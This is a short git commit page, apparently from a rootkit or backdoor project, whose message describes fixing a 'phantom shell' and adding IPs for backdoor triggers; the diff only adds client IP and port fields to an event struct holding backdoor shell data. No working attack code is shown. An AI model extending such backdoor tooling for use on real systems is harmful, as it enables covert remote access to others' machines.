Fixed phantom shell, added ips for all types of backdoor triggers so that we can use different interfaces

This commit is contained in:
h3xduck
2022-05-15 16:45:47 -04:00
parent e6cbe7c24a
commit ce3b267d01
10 changed files with 3442 additions and 3434 deletions

View File

@@ -20,6 +20,8 @@ struct rb_event {
int code;
struct backdoor_phantom_shell_data bps_data;
event_type_t event_type;
__u32 client_ip;
__u16 client_port;
};
#endif